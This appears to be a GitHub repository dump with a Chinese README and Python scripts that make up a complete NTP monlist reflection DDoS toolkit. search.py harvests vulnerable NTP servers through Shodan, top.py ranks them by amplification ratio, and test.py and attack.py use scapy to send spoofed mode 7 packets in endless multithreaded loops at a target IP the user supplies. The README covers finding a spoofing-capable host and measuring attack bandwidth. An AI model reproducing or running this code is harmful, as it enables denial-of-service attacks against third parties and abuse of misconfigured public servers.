├── 2cap.png
├── README.md
├── attack.py
├── search.py
├── server.txt
├── test.py
├── top.py
├── top.txt
└── txy.png


/2cap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/caijynb/ntp-ddos/db4d71e50412c0c09f3349af575b00a04cedfdd0/2cap.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | > 需要有一台ISP没做源地址验证，支持IP Spoof的服务器。很难很难找，但是我有，但是为了防止滥用，就不公开了（doge)。如果有需要的话，那就自己慢慢交学费吧。
 2 | >
 3 | > 还需要shodan的API，这边提供了shodan寻找有monlist漏洞的ntp服务器技巧，我是用会员API KEY写的脚本，非会员的话就修改一下search.py中的search_and_save函数
 4 | 
 5 | 
 6 | ```
 7 | # 从shodan中下载ntp 服务器清单
 8 | python search.py
 9 | 
10 | # 查找ntp放大倍率高的服务器
11 | python top.py
12 | ```
13 | 
14 | 
15 | 
16 | 跑出一份top.txt后，但是实际上top.txt中的ntp服务器很多依然是不可用的，需要将top.txt同时上传到攻击机和模拟受害机实测一下
17 | 
18 | ```
19 | #模拟受害机
20 | tcpdump -i eth0 udp -w 1.cap
21 | 
22 | #攻击机
23 | python3 test.py
24 | 
25 | #模拟受害机，查看抓包的结果。（顺序）输出所有在1.cap中出现次数超过10次且同时存在于top.txt中的ip
26 | tshark -r 1.cap -T fields -e ip.src -Y 'ntp' | sort | uniq -c | sort -n | awk '$1 > 10' | grep -F -f top.txt | awk '{ print $2 }' > final.txt
27 | 
28 | ```
29 | 
30 | 
31 | 
32 | 测试峰值带宽：
33 | 
34 | ```
35 | #模拟受害机
36 | tcpdump -i eth0 udp -w 2.cap
37 | 
38 | #攻击机
39 | python3 attack.py
40 | ```
41 | 
42 | 2.cap用wireshark打开：统计—>I/O图表，Y轴改成Bytes，就可以测算峰值带宽了
43 | ![](2cap.png)
44 | 
45 | 
46 | PS：测试阿里/腾讯服务器貌似不能成功，存在 NTP 的反射防护策略。抓包了一下攻击流量（腾讯云服务器运行`nmap -sU -pU:123 -Pn -n --script=ntp-monlist <存在monlist漏洞的ntp服务器ip>`)，可以看到返回的ip是内网的ip。
47 | 
48 | ![](txy.png)
49 | 
50 | 


--------------------------------------------------------------------------------
/attack.py:
--------------------------------------------------------------------------------
 1 | from scapy.layers.inet import IP, UDP
 2 | from scapy.layers.ntp import NTP
 3 | from scapy.all import send
 4 | from random import randint
 5 | import threading
 6 | import time
 7 | 
 8 | 
 9 | def send_reflection_attack(ntp_server, target):
10 |     while True:
11 |         try:
12 |             sport = randint(40000, 50000)  # 选择40000到50000之间的随机端口
13 |             packet = IP(dst=ntp_server, src=target) / UDP(sport=sport, dport=123) / NTP(version=2, mode=7, stratum=0, poll=3, precision=42)
14 |             send(packet)
15 |             time.sleep(0.01)
16 |         except:
17 |             pass
18 | 
19 | 
20 | def execute_attack(target, filename="final.txt"):
21 |     with open(filename, "r") as file:
22 |         for line in file:
23 |             ntp_server = line.strip()
24 |             # 为每个NTP服务器实例化一个线程。如果要调高攻击倍率，可以增加线程数量
25 |             thread = threading.Thread(target=send_reflection_attack, args=(ntp_server, target))
26 |             thread.start()
27 | 
28 | 
29 | if __name__ == "__main__":
30 |     # 请输入要攻击的目标IP
31 |     target = input("请输入要攻击的目标IP: ")
32 |     execute_attack(target)


--------------------------------------------------------------------------------
/search.py:
--------------------------------------------------------------------------------
 1 | import shodan
 2 | import socket
 3 | 
 4 | API_KEY = ""
 5 | 
 6 | def search_and_save(api_key, query="\"ntpd 4.2.6\"", filename="server.txt", max_pages=5):
 7 |     api = shodan.Shodan(api_key)
 8 |     total_saved = 0
 9 | 
10 |     try:
11 |         # 遍历指定的最大页面数
12 |         for page in range(1, max_pages + 1):
13 |             # 搜索指定的查询，包括页面参数
14 |             results = api.search(query, page=page)
15 | 
16 |             # 打开文件以追加模式
17 |             with open(filename, "a") as file:
18 |                 for result in results['matches']:
19 |                     ip = result['ip_str']
20 |                     file.write(ip + "\n")
21 |                     total_saved += 1
22 | 
23 |             print(f"从页面 {page} 保存了 {len(results['matches'])} 个IP地址")
24 | 
25 |         print(f"总共保存了 {total_saved} 个IP地址到 {filename}")
26 |     except shodan.APIError as e:
27 |         print(f"发生错误: {e}")
28 | 
29 | 
30 | def remove_duplicates():
31 |     filename = "server.txt"
32 |     with open(filename, "r") as file:
33 |         unique_ips = list(set(line.strip() for line in file))
34 | 
35 |     with open(filename, "w") as file:
36 |         for ip in unique_ips:
37 |             file.write(ip + "\n")
38 | 
39 |     print(f"去重后{filename}有 {len(unique_ips)} 个IP地址")
40 | 
41 | def check_server(ntp_server_ip, port=123):
42 |     # 构造一个NTP请求，其中包括monlist查询
43 |     request = b'\x17\x00\x03\x2a' + b'\x00' * 4
44 | 
45 |     # 创建一个UDP套接字并连接到NTP服务器
46 |     with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
47 |         s.settimeout(1)
48 |         s.sendto(request, (ntp_server_ip, port))
49 |         try:
50 |             response, _ = s.recvfrom(2048)
51 |             # 检查响应是否包含至少一个monlist项
52 |             if len(response) > 0:
53 |                 return True
54 |         except socket.timeout:
55 |             pass
56 | 
57 |     return False
58 | 
59 | def check_and_save_vulnerable_servers(filename="server.txt"):
60 |     vulnerable_servers = []
61 | 
62 |     with open(filename, "r") as file:
63 |         for line in file:
64 |             ip = line.strip()
65 |             try:
66 |                 if check_server(ip):
67 |                     vulnerable_servers.append(ip)
68 |                     print(f"发现漏洞的服务器: {ip}")
69 |             except socket.error as e:
70 |                 pass
71 | 
72 |     with open(filename, "w") as file:
73 |         for ip in vulnerable_servers:
74 |             file.write(ip + "\n")
75 | 
76 |     print(f"保存了 {len(vulnerable_servers)} 个存在monlist漏洞的服务器到 {filename}")
77 | 
78 | 
79 | if __name__ == "__main__":
80 |     search_and_save(API_KEY)
81 |     remove_duplicates()
82 |     check_and_save_vulnerable_servers()
83 | 


--------------------------------------------------------------------------------
/server.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/caijynb/ntp-ddos/db4d71e50412c0c09f3349af575b00a04cedfdd0/server.txt


--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
 1 | from scapy.layers.inet import IP, UDP
 2 | from scapy.layers.ntp import NTP
 3 | from scapy.all import send
 4 | from random import randint
 5 | 
 6 | target = input("请输入模拟被害者的IP（输入前请先在模拟机上tcpdump抓包）: ")
 7 | 
 8 | 
 9 | def test_ntp_server(ntp_server, count=10):
10 |     print(f"测试NTP服务器: {ntp_server}")
11 |     for i in range(count):
12 |         try:
13 |             sport = randint(40000, 50000)  # 选择40000到50000之间的随机端口
14 |             packet = IP(dst=ntp_server, src=target) / UDP(sport=sport, dport=123) / NTP(version=2, mode=7, stratum=0,
15 |                                                                                         poll=3, precision=42)
16 |             send(packet)
17 | 
18 |         except:
19 |             pass
20 | 
21 | 
22 | def test_ntp_servers(filename="top.txt"):
23 |     with open(filename, "r") as file:
24 |         for line in file:
25 |             ntp_server = line.strip()
26 |             test_ntp_server(ntp_server)
27 | 
28 | 
29 | if __name__ == "__main__":
30 |     test_ntp_servers()
31 | 
32 | 


--------------------------------------------------------------------------------
/top.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | 
 3 | def get_reflection_ratio(ip, port=123):
 4 |     # 构造一个NTP请求，例如monlist查询
 5 |     request = b'\x17\x00\x03\x2a' + b'\x00' * 4
 6 | 
 7 |     try:
 8 |         # 创建一个UDP套接字并连接到NTP服务器
 9 |         with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
10 |             s.settimeout(1)
11 |             s.sendto(request, (ip, port))
12 |             response, _ = s.recvfrom(2048)
13 | 
14 |             # 计算反射倍数
15 |             return len(response) / len(request)
16 |     except (socket.timeout, OSError):
17 |         return 0
18 | 
19 | def find_top_reflectors(filename="server.txt", top_n=50, output_file="top.txt"):
20 |     servers_reflection_ratios = []
21 | 
22 |     with open(filename, "r") as file:
23 |         for line in file:
24 |             ip = line.strip()
25 |             ratio = get_reflection_ratio(ip)
26 |             servers_reflection_ratios.append((ip, ratio))
27 |             print(f"服务器 {ip} 的反射倍数: {ratio}")
28 | 
29 |     # 按反射倍数降序排序
30 |     servers_reflection_ratios.sort(key=lambda x: x[1], reverse=True)
31 | 
32 |     # 获取反射倍数最大的N个服务器
33 |     top_reflectors = servers_reflection_ratios[:top_n]
34 | 
35 |     print("\n反射倍数最大的服务器:")
36 |     with open(output_file, "w") as file:
37 |         for ip, ratio in top_reflectors:
38 |             print(f"IP: {ip}, 反射倍数: {ratio}")
39 |             file.write(f"{ip}\n")
40 | 
41 |     print(f"\n保存了反射倍数最大的 {top_n} 个服务器到 {output_file}")
42 | 
43 | 
44 | if __name__ == "__main__":
45 |     find_top_reflectors()


--------------------------------------------------------------------------------
/top.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/caijynb/ntp-ddos/db4d71e50412c0c09f3349af575b00a04cedfdd0/top.txt


--------------------------------------------------------------------------------
/txy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/caijynb/ntp-ddos/db4d71e50412c0c09f3349af575b00a04cedfdd0/txy.png


--------------------------------------------------------------------------------